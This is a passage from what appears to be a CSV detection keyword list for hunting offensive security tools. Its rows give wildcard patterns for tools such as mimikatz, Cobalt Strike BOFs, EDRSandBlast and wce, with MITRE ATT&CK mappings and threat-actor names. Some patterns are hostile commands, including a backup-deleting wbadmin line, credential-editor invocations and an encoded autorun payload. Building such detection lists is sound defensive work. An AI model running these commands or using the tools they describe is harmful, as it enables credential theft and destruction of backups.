APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*vtiger_crm_upload_exploit*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*vulfocus/spring-core-rce-*,offensive_tool_keyword,SpringCore0day,SpringCore0day from share.vx-underground.org & some additional links,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/craig/SpringCore0day,1,1,N/A,N/A,4,394,187,2022-03-31T11:54:22Z,2022-03-30T15:50:28Z -*vulmon*Vulmap*,offensive_tool_keyword,Vulmap,Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. 
It is possible to make vulnerability assessments using these scripts. Also. they can be used for privilege escalation by pentesters/red teamers.,T1210.001 - T1190 - T1059 - T1213,TA0007 - TA0002 - TA0008 - TA0011,N/A,N/A,Vulnerability scanner,https://github.com/vulmon/Vulmap,1,1,N/A,N/A,9,888,196,2023-03-18T23:56:41Z,2018-09-07T15:49:36Z -*Vulnerabilities/RPCDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*vulnfactory.org/exploits/*.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*vulns/apache.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*vulns/iis.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*vulns/jrun.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*vulns/tomcat.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information 
Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*vulnweb.com/FUZZ*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*vulny-code-static-analysis --dir *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*vu-ls/Crassus*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,1,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*vyrus001/go-mimikatz*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/vyrus001/go-mimikatz,1,1,N/A,10,6,593,105,2022-09-08T18:14:20Z,2015-10-22T08:43:38Z -*vysecurity*,offensive_tool_keyword,Github Username,github username hosting red team tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/vysecurity,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*vysecurity/ANGRYPUPPY*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,1,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*-w *wordlists*.txt*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - 
T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*w32-speaking-shellcode.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*w32-speaking-shellcode.bin*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*w32-speaking-shellcode-eaf.bin*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*w3af_gui*,offensive_tool_keyword,w3af,w3af is a Web Application Attack and Audit Framework. The projects goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.,T1190 - T1211 - T1220 - T1222 - T1247 - T1592,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://w3af.org/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*WAF-bypass-Cheat-Sheet*,offensive_tool_keyword,WAF-bypass-Cheat-Sheet,WAF/IPS/DLP bypass Cheat Sheet,T1210 - T1204 - T1061 - T1133 - T1190,TA0001 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet,1,1,N/A,N/A,5,408,64,2018-11-28T20:34:17Z,2018-11-28T19:34:02Z -*wafw00f https://*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*wafw00f*,offensive_tool_keyword,wafw00f,To do its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful. 
it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.,T1210.001 - T1190 - T1589,TA0007 - TA0002 - TA0008,N/A,N/A,Defense Evasion,https://github.com/EnableSecurity/wafw00f,1,1,N/A,N/A,10,4470,882,2023-06-28T09:24:59Z,2014-05-14T17:08:16Z -*wapiti -u*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti.git*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti3-*.tar.gz*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti3-*-any.whl*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti3/bin*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti-getcookie*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web 
Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wappalyzer.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*warberry*,offensive_tool_keyword,warberry,WarBerryPi is a RaspberryPi based hardware implant that has the ability to go on stealth mode when used in acuiring informational data from a target network. especially useful during read teaming engagements. Its designed with a special feature that allows it to get the needed information within the shortest time possible. WarBerryPis scripts are designed in such way to avoid noise in the network as much as possible.,T1589 - T1539 - T1562,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/secgroundzero/warberry,1,1,N/A,N/A,10,2209,307,2019-11-09T00:09:44Z,2016-05-10T16:25:03Z -*warpzoneclient.cpp*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*warpzoneclient.exe*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*warpzoneclient.exe*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*warpzoneclient.sln*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*warpzoneclient.vcxproj*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*wavestone-cdt/EDRSandblast*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*wavvs/nanorobeus*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*waza1234*,offensive_tool_keyword,mimikatz,mimikatz exploitation default password,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential 
Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*WazeHell/sam-the-admin*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078.002 - T1078,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/WazeHell/sam-the-admin/tree/main/utils,1,1,N/A,N/A,10,929,190,2022-07-10T22:23:13Z,2021-12-11T15:10:30Z -*wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest*,greyware_tool_keyword,wbadmin,Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. adversaries can make it more challenging for defenders to restore systems and detect their presence.,T1490 - T1562.001,TA0040 - TA0007,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wbadmin DELETE SYSTEMSTATEBACKUP*,greyware_tool_keyword,wbadmin,Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. 
adversaries can make it more challenging for defenders to restore systems and detect their presence.,T1490 - T1562.001,TA0040 - TA0007,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wce -i 3e5 -s *,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,0,N/A,8,4,N/A,N/A,N/A,N/A -*wce*getlsasrvaddr.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*wce-master.zip*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*wce-universal.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*wcfrelayserver.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*wcfrelayserver.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*WCMCredentials.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*wdextract *:\*\*.vdm*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*wdextract *\mrt.exe*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*WDExtract-master*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*wdigest!g_fParameter_UseLogonCredential*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*wdigest!g_IsCredGuardEnabled*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*wdigest/decryptor.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*--wdigest-offsets *.csv *,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*WdigestOffsets.csv*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*We had a woodoo*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and 
